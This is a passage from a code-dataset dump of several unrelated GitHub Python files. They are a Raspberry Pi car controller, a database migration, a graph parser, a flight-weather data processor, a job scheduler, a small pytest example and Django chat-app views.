Back\")\n #self.request = request\n\n # Turn Left\n def left(self, request, b_k = 0):\n for i in range(4):\n t = i == 2\n GPIO.output(IN[i], t)\n\n pwm_EN_A.ChangeDutyCycle(80)\n pwm_EN_B.ChangeDutyCycle(80)\n\n time.sleep(self.dt)\n if b_k == 0:\n self.brake()\n return HttpResponse(\"Turn Left\")\n #self.request = request\n\n # Turn Right\n def right(self, request, b_k = 0):\n for i in range(4):\n t = i == 0\n GPIO.output(IN[i], t)\n\n pwm_EN_A.ChangeDutyCycle(80)\n pwm_EN_B.ChangeDutyCycle(80)\n\n time.sleep(self.dt)\n if b_k == 0:\n self.brake()\n return HttpResponse(\"Turn Right\")\n #self.request = request\n\n # Turn Left in Situ\n def situ_left(self, request, b_k = 0):\n for i in range(4):\n t = i in [1, 2]\n GPIO.output(IN[i], t)\n\n pwm_EN_A.ChangeDutyCycle(80)\n pwm_EN_B.ChangeDutyCycle(80)\n\n time.sleep(self.dt)\n if b_k == 0:\n self.brake()\n return HttpResponse(\"Turn Left in Situ\")\n #self.request = request\n\n # Turn Right in Situ\n def situ_right(self, request, b_k = 0):\n for i in range(4):\n t = i in [0, 3]\n GPIO.output(IN[i], t)\n\n pwm_EN_A.ChangeDutyCycle(80)\n pwm_EN_B.ChangeDutyCycle(80)\n\n time.sleep(self.dt)\n if b_k == 0:\n self.brake()\n return HttpResponse(\"Turn Right in Situ\")\n #self.request = request\n\n # Infrared Avoid\n # def infrared_avoid(self, request):\n # i = None\n # while i == None:\n # LeftSensorValue = GPIO.input(AvoidSensorLeft)\n # RightSensorValue = GPIO.input(AvoidSensorRight)\n #\n # if LeftSensorValue == 
True and RightSensorValue == True:\n # run()\n # elif LeftSensorValue == False and RightSensorValue == True:\n # spin_right()\n # time.sleep(0.002)\n # elif LeftSensorValue == True and RightSensorValue == False:\n # spin_left()\n # time.sleep(0.002)\n # return HttpResponse(\"Infrared Avoid\")\n\n # Stop to Run the Car\n def stop_run(self, request):\n self.brake()\n return HttpResponse(\"Stop to Run the Car\")\n #self.request = request\n\n # End Control\n def all_stop(self, request):\n self.request = request\n pwm_EN_A.stop()\n pwm_EN_B.stop()\n\n GPIO.cleanup()\n return HttpResponse(\"End Control\")\n", "repo_name": "darren-k-chen/PiConsole", "sub_path": "home/car_control/run.py", "file_name": "run.py", "file_ext": "py", "file_size_in_byte": 4971, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "31", "api": [{"api_name": "RPi.GPIO.setmode", "line_number": 33, "usage_type": "call"}, {"api_name": "RPi.GPIO", "line_number": 33, "usage_type": "name"}, {"api_name": "RPi.GPIO.BCM", "line_number": 33, "usage_type": "attribute"}, {"api_name": "RPi.GPIO.setwarnings", "line_number": 34, "usage_type": "call"}, {"api_name": "RPi.GPIO", "line_number": 34, "usage_type": "name"}, {"api_name": "RPi.GPIO.setup", "line_number": 45, "usage_type": "call"}, {"api_name": "RPi.GPIO", "line_number": 45, "usage_type": "name"}, {"api_name": "RPi.GPIO.OUT", "line_number": 45, "usage_type": "attribute"}, {"api_name": "RPi.GPIO.setup", "line_number": 47, "usage_type": "call"}, {"api_name": "RPi.GPIO", "line_number": 47, "usage_type": "name"}, {"api_name": "RPi.GPIO.OUT", "line_number": 47, "usage_type": "attribute"}, {"api_name": "RPi.GPIO.PWM", "line_number": 48, "usage_type": "call"}, {"api_name": "RPi.GPIO", "line_number": 48, "usage_type": "name"}, {"api_name": "RPi.GPIO.setup", "line_number": 51, "usage_type": "call"}, {"api_name": "RPi.GPIO", "line_number": 51, "usage_type": "name"}, {"api_name": "RPi.GPIO.OUT", "line_number": 51, "usage_type": "attribute"}, {"api_name": "RPi.GPIO.PWM", "line_number": 52, "usage_type": "call"}, {"api_name": "RPi.GPIO", "line_number": 52, "usage_type": "name"}, {"api_name": "RPi.GPIO.setup", "line_number": 56, "usage_type": "call"}, {"api_name": "RPi.GPIO", "line_number": 56, "usage_type": "name"}, {"api_name": "RPi.GPIO.IN", "line_number": 56, "usage_type": "attribute"}, {"api_name": "RPi.GPIO.setup", "line_number": 57, "usage_type": "call"}, {"api_name": "RPi.GPIO", "line_number": 57, "usage_type": "name"}, {"api_name": "RPi.GPIO.IN", "line_number": 57, "usage_type": "attribute"}, {"api_name": "RPi.GPIO.output", "line_number": 62, "usage_type": "call"}, {"api_name": "RPi.GPIO", "line_number": 62, "usage_type": "name"}, {"api_name": "time.sleep", "line_number": 67, "usage_type": "call"}, {"api_name": "RPi.GPIO.output", "line_number": 75, "usage_type": "call"}, {"api_name": "RPi.GPIO", "line_number": 75, "usage_type": "name"}, {"api_name": "time.sleep", "line_number": 80, "usage_type": "call"}, {"api_name": "django.http.HttpResponse", "line_number": 83, "usage_type": "call"}, {"api_name": "RPi.GPIO.output", "line_number": 91, "usage_type": "call"}, {"api_name": "RPi.GPIO", "line_number": 91, "usage_type": "name"}, {"api_name": "time.sleep", "line_number": 96, "usage_type": "call"}, {"api_name": "django.http.HttpResponse", "line_number": 99, "usage_type": "call"}, {"api_name": "RPi.GPIO.output", "line_number": 106, "usage_type": "call"}, {"api_name": "RPi.GPIO", "line_number": 106, "usage_type": "name"}, {"api_name": 
"time.sleep", "line_number": 111, "usage_type": "call"}, {"api_name": "django.http.HttpResponse", "line_number": 114, "usage_type": "call"}, {"api_name": "RPi.GPIO.output", "line_number": 121, "usage_type": "call"}, {"api_name": "RPi.GPIO", "line_number": 121, "usage_type": "name"}, {"api_name": "time.sleep", "line_number": 126, "usage_type": "call"}, {"api_name": "django.http.HttpResponse", "line_number": 129, "usage_type": "call"}, {"api_name": "RPi.GPIO.output", "line_number": 136, "usage_type": "call"}, {"api_name": "RPi.GPIO", "line_number": 136, "usage_type": "name"}, {"api_name": "time.sleep", "line_number": 141, "usage_type": "call"}, {"api_name": "django.http.HttpResponse", "line_number": 144, "usage_type": "call"}, {"api_name": "RPi.GPIO.output", "line_number": 151, "usage_type": "call"}, {"api_name": "RPi.GPIO", "line_number": 151, "usage_type": "name"}, {"api_name": "time.sleep", "line_number": 156, "usage_type": "call"}, {"api_name": "django.http.HttpResponse", "line_number": 159, "usage_type": "call"}, {"api_name": "django.http.HttpResponse", "line_number": 182, "usage_type": "call"}, {"api_name": "RPi.GPIO.cleanup", "line_number": 191, "usage_type": "call"}, {"api_name": "RPi.GPIO", "line_number": 191, "usage_type": "name"}, {"api_name": "django.http.HttpResponse", "line_number": 192, "usage_type": "call"}]}
+{"seq_id": "17630731336", "text": "\"\"\"add relationship btw comment and user\n\nRevision ID: fdcf61ab1711\nRevises: 7fa77002d3cb\nCreate Date: 2020-01-20 09:19:06.902255\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\n\n\n# revision identifiers, used by Alembic.\nrevision = 'fdcf61ab1711'\ndown_revision = '7fa77002d3cb'\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.add_column('blogs', sa.Column('posted', sa.DateTime(), nullable=True))\n # ### end Alembic commands ###\n\n\ndef downgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.drop_column('blogs', 'posted')\n # ### end Alembic commands ###\n", "repo_name": "trevor-ngugi/Drew-Of-Lines", "sub_path": "migrations/versions/fdcf61ab1711_add_relationship_btw_comment_and_user.py", "file_name": "fdcf61ab1711_add_relationship_btw_comment_and_user.py", "file_ext": "py", "file_size_in_byte": 676, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "31", "api": [{"api_name": "alembic.op.add_column", "line_number": 21, "usage_type": "call"}, {"api_name": "alembic.op", "line_number": 21, "usage_type": "name"}, {"api_name": "sqlalchemy.Column", "line_number": 21, "usage_type": "call"}, {"api_name": "sqlalchemy.DateTime", "line_number": 21, "usage_type": "call"}, {"api_name": "alembic.op.drop_column", "line_number": 27, "usage_type": "call"}, {"api_name": "alembic.op", "line_number": 27, "usage_type": "name"}]}
+{"seq_id": "71244441049", "text": "import json\nimport networkx as nx\nimport matplotlib.pyplot as plt\nimport pydotplus\nfrom buf import Buf\nfrom accessor import Accessor\n\nclass Parser():\n\n\tdef addNodes(self,currNode,parent):\n\t\t#print(\"test\");\n\t\t#print(currNode);\n\t\taL = [];\n\t\tself.G.add_node(currNode,overflowFlag = False, accessor = '', buffer = '', line=self.data[currNode]['nodeName']['line#']);\n\t\tif(self.data[currNode]['accessors']['vars'] != ''):\n\t\t\ttempAcc = Accessor(self.data[currNode]['accessors']['vars'], self.data[currNode]['accessors']['maxValues']);\n\t\t\tself.G.add_node(currNode,accessor = tempAcc);\n\t\tif(self.data[currNode]['bufField']['accessors'] != ''):\n\t\t\ttempVars = self.data[currNode]['bufField']['accessors'].split(',');\n\t\t\tfor i in range(len(tempVars)):\n\t\t\t\taL.append(Accessor(tempVars[i],\"\"));\n\t\t\ttempBuffer = Buf(aL,self.data[currNode]['bufField']['size'],self.data[currNode]['bufField']['expression'],self.data[currNode]['bufField']['type']);\n\t\t\tself.G.add_node(currNode,buffer = tempBuffer);\n\t\t\t\n\t\t\n\t\tif(parent != ''):\n\t\t\tself.G.add_edge(parent,currNode);\n\t\tif(self.data[currNode]['children']['taken'] == '') and (self.data[currNode]['children']['nTaken'] == ''):\n\t\t\tself.G.add_node('end',overflowFlag = False, accessor = '', buffer = '',line ='');\n\t\t\tself.G.add_edge(currNode,'end');\n\t\t\treturn;\n\t\tparent = currNode;\n\t\tcurrNode = 'node'+self.data[currNode]['children']['taken'];\n\t\tself.addNodes(currNode,parent);\n\t\tif(self.data[currNode]['children']['nTaken'] != ''):\n\t\t\tparent = currNode;\n\t\t\tcurrNode = 'node'+self.data[currNode]['children']['nTaken'];\n\t\t\tself.addNodes(currNode,parent);\n\t\t\t\n\t\t\t\n\tdef __init__(self, file):\n\t\twith open(file) as data_file: \n\t\t\tself.data = json.load(data_file);\n\t\tself.G = nx.DiGraph();\n\t\t#self.G.add_node(self.data['root']['nodeName']['line#']);\n\t\tself.addNodes('root','');\n\t\t#print(self.G.nodes());\n\t\t#print(self.G.edges());\n\t\t\n\t\n\t\n\t\t\n\t\n \ndef main():\n\tparser = Parser(\"../assets/stack_overflow_1.json\");\n\tprint(parser.data['root']['children']['taken']);\n\tprint('');\n\tprint(len(parser.data['root']))\n\tprint(len(parser.data))\n\tprint(parser.G.node['node52']['buffer'].getAccessorList()[0].getVar());\n\t\n\tnx.nx_pydot.write_dot(parser.G,'test.dot');\n\tpos = nx.nx_pydot.graphviz_layout(parser.G, prog = 'dot');\n\tnx.draw(parser.G, pos, with_labels = True, arrows = True);\n\tplt.show();\n\t\nif __name__ == \"__main__\":\n main()\n", "repo_name": "grahonan/GPUsploit", "sub_path": "src/parser.py", "file_name": "parser.py", "file_ext": "py", "file_size_in_byte": 2344, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "31", "api": [{"api_name": "accessor.Accessor", "line_number": 16, "usage_type": "call"}, {"api_name": "accessor.Accessor", "line_number": 21, "usage_type": "call"}, {"api_name": "buf.Buf", "line_number": 22, "usage_type": "call"}, {"api_name": "json.load", "line_number": 43, "usage_type": "call"}, {"api_name": "networkx.DiGraph", "line_number": 44, "usage_type": "call"}, {"api_name": "networkx.nx_pydot.write_dot", "line_number": 63, "usage_type": "call"}, {"api_name": "networkx.nx_pydot", "line_number": 63, "usage_type": "attribute"}, {"api_name": "networkx.nx_pydot.graphviz_layout", "line_number": 64, "usage_type": "call"}, {"api_name": "networkx.nx_pydot", "line_number": 64, "usage_type": "attribute"}, {"api_name": "networkx.draw", 
"line_number": 65, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.show", "line_number": 66, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 66, "usage_type": "name"}]}
+{"seq_id": "10752777935", "text": "import csv\nimport os\nimport datetime\nfrom multiprocessing import Pool\nimport uuid\nimport time\nimport json\nimport requests\nimport random\n\n# Filepaths\npath = os.path.abspath(os.path.dirname(__file__))\n# relative path to the data folder\npath += '/../data'\n\n# Do whatever you need to do with the row data in here\ndef row_handler(row):\n # since I used dictReader each row is now formatted in a dictionary so you can get \n # values by the names at the top of the columns, that'll make it much simpler\n origin = row['ORIGIN']\n dest = row['DEST']\n\n # Zero out negative delay values\n delay = 0 if int(row[\"CRS_DEP_TIME\"]) < 0 else row[\"CRS_DEP_TIME\"]\n\n # Pre-process time\n time_raw = row[\"CRS_DEP_TIME\"]\n while len(time_raw) < 4:\n time_raw = \"0\" + time_raw\n\n # Create naive date objects \n date_obj = datetime.datetime.strptime(row[\"FL_DATE\"] + \"\\t\" + time_raw, \"%Y-%m-%d\\t%H%M\")\n\n # Get weather data\n weather_origin = get_weather_data(origin, date_obj)\n\n weather_dest = get_weather_data(dest, date_obj)\n\n try:\n processedTime = weather_origin[\"processedTime\"]\n except:\n print(json.dumps(weather_origin.json(), indent=4) + \" \" + str(origin) + str(date_obj))\n\n try:\n precip_type_orig = \"N/A\" if weather_origin[\"weather\"][\"precipIntensity\"] == 0 else weather_origin[\"weather\"][\"precipType\"]\n precip_type_dest = \"N/A\" if weather_dest[\"weather\"][\"precipIntensity\"] == 0 else weather_dest[\"weather\"][\"precipType\"]\n except:\n time.sleep(5)\n precip_type_orig = \"N/A\" if weather_origin[\"weather\"][\"precipIntensity\"] == 0 else weather_origin[\"weather\"][\"precipType\"]\n precip_type_dest = \"N/A\" if weather_dest[\"weather\"][\"precipIntensity\"] == 0 else weather_dest[\"weather\"][\"precipType\"]\n\n # Parse dst\n dst = 1 if weather_origin[\"processedTime\"][\"dst\"] == \"true\" else 0\n\n #origin_bearing = \"N/A\" if weather_origin[\"weather\"][\"windSpeed\"] == None or weather_origin[\"weather\"][\"windSpeed\"] == 0 else weather_origin[\"weather\"][\"windBearing\"]\n #dest_bearing = \"N/A\" if weather_origin[\"weather\"][\"windSpeed\"] == None or weather_dest[\"weather\"][\"windSpeed\"] == 0 else weather_dest[\"weather\"][\"windBearing\"]\n\n\n return {'UTC_TIME':weather_origin[\"processedTime\"][\"time\"], \n 'CARRIER':row[\"UNIQUE_CARRIER\"], \n 'ORIGIN':origin, \n 'DEST':dest, \n 'DEP_DELAY':delay, \n 'CANCELLED':row['CANCELLED'],\n 'DST':dst,\n \"TEMP_ORIGIN\":weather_origin[\"weather\"][\"temperature\"], \n \"PRECIP_ORIGIN\":weather_origin[\"weather\"][\"precipIntensity\"], \n \"PRECIP_TYPE_ORIGIN\":precip_type_orig,\n #\"WIND_SPEED_ORIGIN\":weather_origin[\"weather\"][\"windSpeed\"], \n #\"WIND_BEARING_ORIGIN\":origin_bearing, \n #\"WIND_SPEED_DEST\":weather_dest[\"weather\"][\"windSpeed\"], \n #\"WIND_BEARING_DEST\":weather_dest, \n \"TEMP_DEST\":weather_dest[\"weather\"][\"temperature\"], \n \"PRECIP_DEST\":weather_dest[\"weather\"][\"precipIntensity\"],\n \"PRECIP_TYPE_DEST\":precip_type_dest\n }\n\ndef get_weather_data(iata, time):\n time = str(time)\n time = time[0:len(time) - 3]\n\n BASE_URL = \"http://localhost\"\n\n params = {'code':iata, 'time':time}\n\n res = requests.get(BASE_URL, params=params)\n #print(str(res.status_code) + \" \" + str(iata) + \" \" + str(time))\n \n return res.json()\n\n \n\n\nif __name__ == \"__main__\":\n for file in os.listdir(path):\n filename = os.path.join(path, file) #FIXME replace with 'file'\n outfilename = file + \"~processed\"\n with open(outfilename, 
mode=\"w+\", newline='') as outfile:\n fieldnames = [\"UTC_TIME\", \n \"CARRIER\", \n \"ORIGIN\", \n \"DEST\", \n \"DEP_DELAY\", \n \"CANCELLED\", \n \"DST\", \n \"TEMP_ORIGIN\", \n \"PRECIP_ORIGIN\", \n \"PRECIP_TYPE_ORIGIN\",\n #\"WIND_SPEED_ORIGIN\", \n #\"WIND_BEARING_ORIGIN\", \n #\"WIND_SPEED_DEST\", \n #\"WIND_BEARING_DEST\", \n \"TEMP_DEST\", \n \"PRECIP_DEST\",\n \"PRECIP_TYPE_DEST\"]\n writer = csv.DictWriter(outfile, fieldnames)\n writer.writeheader()\n\n # Open files\n with open(filename, newline='') as csvfile: \n reader = csv.DictReader(csvfile)\n\n for row in reader:\n writer.writerow(row_handler(row))\n", "repo_name": "leonm1/FlightSense", "sub_path": "python/processStats.py", "file_name": "processStats.py", "file_ext": "py", "file_size_in_byte": 4585, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "31", "api": [{"api_name": "os.path.abspath", "line_number": 12, "usage_type": "call"}, {"api_name": "os.path", "line_number": 12, "usage_type": "attribute"}, {"api_name": "os.path.dirname", "line_number": 12, "usage_type": "call"}, {"api_name": "datetime.datetime.strptime", "line_number": 32, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 32, "usage_type": "attribute"}, {"api_name": "json.dumps", "line_number": 42, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 48, "usage_type": "call"}, {"api_name": "requests.get", "line_number": 86, "usage_type": "call"}, {"api_name": "os.listdir", "line_number": 95, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 96, "usage_type": "call"}, {"api_name": "os.path", "line_number": 96, "usage_type": "attribute"}, {"api_name": "csv.DictWriter", "line_number": 116, "usage_type": "call"}, {"api_name": "csv.DictReader", "line_number": 121, "usage_type": "call"}]}
+{"seq_id": "2661093852", "text": "#https://apscheduler.readthedocs.io/en/3.x/userguide.html\nfrom typing import List\nfrom apscheduler.schedulers.background import BackgroundScheduler\nfrom API import settings\nfrom job_runner.job_runner import JobRunner\n\n\n\n\nclass Scheduler:\n def __init__(self):\n self.scheduler = BackgroundScheduler(timezone=settings.TIME_ZONE)\n self.job_runner = JobRunner()\n self.job = None\n\n def create_func(self, func, dep_funcs: List, **kwargs):\n func(**kwargs)\n for dep_func in dep_funcs:\n dep_func(**kwargs)\n\n def run(self):\n if not self.scheduler.running:\n self.scheduler.start()\n print(\"Scheduler has started\")\n\n def add_job(self, hours='*', minutes=\"*\"):\n job_id = \"abc\"\n cron_job = {'month': '*', 'day': '*', 'hour': hours, 'minute': minutes}\n process_articles = lambda: self.create_func(func=self.job_runner.get_new_articles,\n dep_funcs=[self.job_runner.create_playlists])\n\n #self.job_runner.save_embeddings,\n #self.job_runner.add_audio_for_new_entries,\n if self.job:\n self.scheduler.remove_job(job_id)\n self.job = self.scheduler.add_job(process_articles, 'cron', id=job_id, **cron_job)\n print(f\"Job with id {job_id} has been added\")\n\n", "repo_name": "cesko-digital/audiozpravy", "sub_path": "backend/job_runner/scheduler.py", "file_name": "scheduler.py", "file_ext": "py", "file_size_in_byte": 1334, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "31", "api": [{"api_name": "apscheduler.schedulers.background.BackgroundScheduler", "line_number": 12, "usage_type": "call"}, {"api_name": "API.settings.TIME_ZONE", "line_number": 12, "usage_type": "attribute"}, {"api_name": "API.settings", "line_number": 12, "usage_type": "name"}, {"api_name": "job_runner.job_runner.JobRunner", "line_number": 13, "usage_type": "call"}, {"api_name": "typing.List", "line_number": 16, "usage_type": "name"}]}
+{"seq_id": "24033461440", "text": "\"\"\"\nCreated on March 06, 2023\n\n@author: Romulo\n\"\"\"\nimport os\nimport json\n\n\ndef read_cheese_performance():\n full_path = os.path.expanduser(\"~/cheese.json\")\n\n with open(full_path, 'r') as f:\n prefs = json.load(f)\n return prefs\n\n\ndef write_cheese_preferences(prefs):\n full_path = os.path.expanduser(\"~/cheese.json\")\n\n with open(full_path, 'w') as f:\n json.dump(prefs, f, indent=4)\n\n\ndef write_defould_cheese_preferences():\n write_cheese_preferences(_default_prefs)\n\n_default_prefs = {\n 'slicing': ['manchago', 'sharp'],\n 'spreadable': ['Saint Andre', 'cambert', 'bucheron', 'goat', 'humbolt fog', 'cambozola'],\n 'salads': ['crumbled feta']\n}\n\nif __name__ == '__main__':\n write_defould_cheese_preferences()\n", "repo_name": "romulovieira777/The_Complete_Automation_PyTest_Course_for_2022", "sub_path": "Section_08_Built_in_Fixtures/monkey/cheese.py", "file_name": "cheese.py", "file_ext": "py", "file_size_in_byte": 747, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "31", "api": [{"api_name": "os.path.expanduser", "line_number": 11, "usage_type": "call"}, {"api_name": "os.path", "line_number": 11, "usage_type": "attribute"}, {"api_name": "json.load", "line_number": 14, "usage_type": "call"}, {"api_name": "os.path.expanduser", "line_number": 19, "usage_type": "call"}, {"api_name": "os.path", "line_number": 19, "usage_type": "attribute"}, {"api_name": "json.dump", "line_number": 22, "usage_type": "call"}]}
+{"seq_id": "74565916249", "text": "import json\nfrom django.shortcuts import render, redirect, HttpResponse\nfrom django.contrib.auth.decorators import login_required\nfrom django.urls import reverse\nfrom django.contrib.auth import authenticate, login, logout\nfrom chat.models import Chat, File, UserProfile, Message, DjangoUser\nfrom chat.forms import ChangeUserDisplayName, FileForm, UserForm, UserProfileForm, ChatForm, ChangeUserProfilePic\n\n\n@login_required\ndef search_profiles(request):\n context_dict = {}\n \n if request.method == \"POST\":\n searched = request.POST['searched']\n profiles = UserProfile.objects.filter(display_name__contains=searched)\n context_dict['searched'] = searched\n context_dict['profiles'] = profiles\n return render(request, 'chat/search_profiles.html', context_dict)\n else:\n return render(request, 'chat/search_profiles.html', context_dict)\n \n\n@login_required\ndef leave_group_chat(request, chat_name_slug):\n try:\n user_profile = UserProfile.objects.get(user=request.user)\n chat = Chat.objects.get(slug=chat_name_slug)\n except Chat.DoesNotExist:\n chat = None\n chat.users.remove(user_profile)\n chat.save()\n return redirect(reverse('chat:chat'))\n\n\n@login_required\ndef get_user_chats(request):\n context_dict = {}\n try:\n chat_list = []\n for chat in Chat.objects.all():\n for user in chat.users.all():\n if str(user) == str(request.user):\n chat_list.append(chat)\n break\n context_dict['chats'] = chat_list\n except:\n context_dict['chats'] = None\n return context_dict\n\n@login_required\ndef members(request, chat_name_slug):\n context_dict = {}\n try:\n chat = Chat.objects.get(slug=chat_name_slug)\n chat_members = Chat.objects.get(slug=chat_name_slug).users.all()\n chat_owner = chat.owner\n user = UserProfile.objects.filter(user=request.user)\n # chat_image = chat.image #could someone add this to data base\n except:\n chat = None\n chat_members = None\n chat_owner = None\n context_dict['chat_name'] = chat\n context_dict['chat_members'] = chat_members\n context_dict['chat_name_slug'] = chat_name_slug\n context_dict['owner'] = chat_owner\n context_dict['current_user'] = user.get()\n print(user.get(), chat_owner)\n return render(request, 'chat/members.html', context_dict)\n\n@login_required\ndef remove_member(request, chat_name_slug, username):\n user = DjangoUser.objects.get(username=username)\n userProfile = UserProfile.objects.get(user=user)\n chat = Chat.objects.get(slug=chat_name_slug)\n chat.users.remove(userProfile)\n chat.save()\n Chat.objects.get(slug=chat_name_slug).users.remove(userProfile)\n return redirect(reverse('chat:members', args=(chat_name_slug,)))\n\n\n@login_required\ndef add_member(request, chat_name_slug, username):\n try:\n user = DjangoUser.objects.get(username=username)\n except:\n return redirect(reverse('chat:members', args=(chat_name_slug,)))\n userProfile = UserProfile.objects.get(user=user)\n chat = Chat.objects.get(slug=chat_name_slug)\n chat.users.add(userProfile)\n chat.save()\n return redirect(reverse('chat:members', args=(chat_name_slug,)))\n\n@login_required\ndef delete_account(request):\n try:\n user_profile = UserProfile.objects.get(user=request.user)\n user = DjangoUser.objects.get(userprofile=user_profile)\n except UserProfile.DoesNotExist:\n user = None\n user_profile.delete()\n user.delete()\n return redirect(reverse('chat:signup'))\n\n@login_required\ndef delete_group_chat(request, chat_name_slug):\n try:\n chat = Chat.objects.get(slug=chat_name_slug)\n except Chat.DoesNotExist:\n chat = None\n chat.delete()\n 
return redirect(reverse('chat:chat')) \n\n@login_required\ndef files(request, chat_name_slug):\n context_dict = {}\n form = FileForm\n context_dict['form'] = form\n try:\n chat = Chat.objects.get(slug=chat_name_slug)\n user = UserProfile.objects.filter(user=request.user)\n chat_owner = chat.owner\n except:\n # bail out if the chat or profile lookup fails\n return redirect(reverse('chat:chat'))\n context_dict['chat_name_slug'] = chat_name_slug\n context_dict['chat_name'] = chat\n context_dict['current_user'] = user.get()\n context_dict['owner'] = chat_owner\n context_dict['files'] = File.objects.filter(chat=chat)\n if request.method == 'POST':\n form = FileForm(request.POST, request.FILES)\n if form.is_valid():\n print('valid form')\n \n file_instance = form.save(commit=False)\n file_instance.chat = chat \n \n file_instance.save()\n return redirect(reverse('chat:files', kwargs={'chat_name_slug': chat_name_slug}))\n else:\n print(form.errors)\n else:\n form = FileForm()\n return render(request, 'chat/files.html', context_dict)\n\n@login_required\ndef chat(request, chat_name_slug):\n context_dict = {}\n context_dict['chats'] = Chat.objects.all()\n try:\n this_chat = Chat.objects.get(slug=chat_name_slug)\n owner = this_chat.owner\n context_dict['messages'] = Message.objects.filter(chat=this_chat)\n context_dict['owner'] = owner\n context_dict['chat_name'] = this_chat.name\n context_dict['chat_name_slug'] = this_chat.slug\n context_dict['current_user'] = UserProfile.objects.filter(user=request.user).get()\n context_dict['this_username'] = UserProfile.objects.filter(user=request.user)[0].user.username\n except Chat.DoesNotExist:\n pass\n return render(request, 'chat/chat.html', context_dict)\n\ndef user_login(request):\n if request.method == 'POST':\n username = request.POST.get('username')\n password = request.POST.get('password')\n user = authenticate(username=username, password=password)\n\n if user:\n if user.is_active:\n login(request, user)\n return redirect(reverse('chat:chat'))\n else:\n print(f\"Invalid login details: {username}, {password}\")\n return render(request, \"chat/login.html\", context={'invalid_login':True})\n else:\n return render(request, \"chat/login.html\", context={'invalid_login':False})\n\n@login_required\ndef main_page(request):\n return render(request, \"chat/mainpage.html\", context=get_user_chats(request))\n\n#@login_required\ndef send_message(request, chat_name_slug):\n username = request.GET['username']\n content = request.GET['content']\n chat_slug = request.GET['chat_slug']\n chat = Chat.objects.get(slug=chat_slug)\n sender = UserProfile.objects.get(user=request.user)\n if(content):\n m = Message.objects.create(content=content, chat=chat, sender=sender)\n m.save()\n return get_messages(request, chat_name_slug)\n\n#@login_required\ndef get_messages(request, chat_name_slug):\n chat_slug = request.GET['chat_slug']\n messages = Message.objects.filter(chat=Chat.objects.get(slug=chat_slug))\n messages_list = [{'pic':m.sender.picture.url,'time_stamp':str(m.time_stamp), 'sender':m.sender.user.username, 'content':m.content} for m in messages]\n return HttpResponse(json.dumps(messages_list))\n\ndef sign_up(request):\n registered = False\n\n if request.method == 'POST':\n user_form = UserForm(request.POST)\n profile_form = UserProfileForm(request.POST)\n\n if user_form.is_valid() and profile_form.is_valid():\n user = user_form.save()\n user.set_password(user.password)\n user.save()\n\n profile = profile_form.save(commit=False)\n profile.user = user\n\n if 'picture' in request.FILES:\n profile.picture = 
request.FILES['picture']\n\n profile.save()\n\n registered = True\n return redirect(reverse('chat:login'))\n else:\n print(user_form.errors, profile_form.errors)\n\n else:\n user_form = UserForm()\n profile_form = UserProfileForm()\n\n return render(request,'chat/signup.html',\n context={'user_form':user_form,\n 'profile_form':profile_form,\n 'registered':registered}\n )#request needs to be added\n\n@login_required\ndef create_page(request):\n context_dict = {}\n user_profiles = UserProfile.objects.all()\n usernames = [i.user.username for i in user_profiles]\n context_dict['all_users'] = user_profiles\n context_dict['usernames'] = json.dumps(usernames)\n context_dict['current_user'] = json.dumps(request.user.username)\n \n if request.method == 'POST':\n members_str = request.POST.get('user_list')\n try:\n members = json.loads(members_str)\n except:\n members = []\n owner = UserProfile.objects.get(user=request.user)\n chat_form = ChatForm(request.POST, request.FILES)\n user_list = []\n for i in user_profiles:\n if i.user.username in members:\n user_list.append(i)\n\n if chat_form.is_valid():\n print('valid')\n chat = chat_form.save(commit=False)\n chat.save()\n chat.users.add(owner)\n for i in user_list:\n chat.users.add(i)\n chat.save()\n return redirect('chat:chat')\n else:\n print(chat_form.errors)\n else:\n chat_form = ChatForm()\n \n return render(request,'chat/createchat.html',context=context_dict)\n\n@login_required\ndef user_logout(request):\n logout(request)\n return redirect(reverse('chat:login'))#need to add a reverse url\n\ndef test(request):\n return render(request,'chat/test.html',context = {})\n\n@login_required\ndef profile(request):\n context_dict = {}\n pic_form = ChangeUserProfilePic\n display_name_form = ChangeUserDisplayName\n try:\n context_dict['display_name_form'] = display_name_form\n context_dict['pic_form'] = pic_form\n context_dict['current_user'] = UserProfile.objects.filter(user=request.user).get()\n except:\n context_dict['current_user'] = None\n \n if request.method == 'POST':\n \n \n user = UserProfile.objects.get(user=request.user)\n form_type = request.POST.get('form_type')\n if form_type == 'display_name_form':\n display_name_form = ChangeUserDisplayName(request.POST)\n if display_name_form.is_valid():\n print('valid display')\n display_name = display_name_form.cleaned_data['display_name']\n user.display_name = display_name\n user.save()\n return redirect('chat:profile')\n # handle display_name_form submission\n else:\n print(display_name_form.errors)\n elif form_type == 'pic_form':\n pic_form = ChangeUserProfilePic(request.POST, request.FILES)\n if pic_form.is_valid():\n print('valid')\n picture = pic_form.cleaned_data['picture']\n user.picture = picture\n user.save()\n return redirect('chat:profile')\n else:\n print(pic_form.errors)\n else:\n display_name_form = ChangeUserDisplayName()\n pic_form = ChangeUserProfilePic()\n\n \n return render(request,'chat/profile.html',context=context_dict)\n", "repo_name": "JoeJ1/WAD2_Group_Project", "sub_path": "chat/views.py", "file_name": "views.py", "file_ext": "py", "file_size_in_byte": 11443, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "31", "api": [{"api_name": "chat.models.UserProfile.objects.filter", "line_number": 16, "usage_type": "call"}, {"api_name": "chat.models.UserProfile.objects", "line_number": 16, "usage_type": "attribute"}, {"api_name": "chat.models.UserProfile", "line_number": 16, "usage_type": "name"}, {"api_name": 
